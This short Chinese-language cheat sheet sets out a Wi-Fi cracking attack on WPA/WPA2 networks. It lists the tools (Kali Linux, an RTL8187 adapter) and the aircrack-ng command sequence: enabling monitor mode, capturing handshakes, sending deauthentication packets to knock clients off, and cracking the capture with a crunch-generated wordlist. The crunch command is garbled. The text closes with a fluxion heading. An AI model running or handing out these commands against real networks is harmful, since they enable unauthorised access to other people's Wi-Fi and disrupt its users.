攻击准备

  1. VM虚拟机
  2. linux kail系统
  3. 外接网卡rlt8187

攻击用linux常见指令

iwconfig #显示网卡设备
airmon-ng start wlan0 #激活网卡设备
airmon-ng stop wlan0 #关闭网卡
airodump-ng wlan0mon #启用已激活的wlan0监听wifi
airodump-ng -c [信道ch] -w /root/cap/er8 --bssid [MAC] wlan0mon  #获取握手协议包储存在目录/root/cap/下
aireplay-ng -0 5 -a [mac] wlan0mon #发起5次攻击,使路由器重启,然后获得握手包裹
crunch 10 10 123 >>/root.123.txt /root/cap/er8-01.cap #使用指定目录密码本进行破译握手包

fluxion -6.9 攻击流程

扫描wpa/wpa2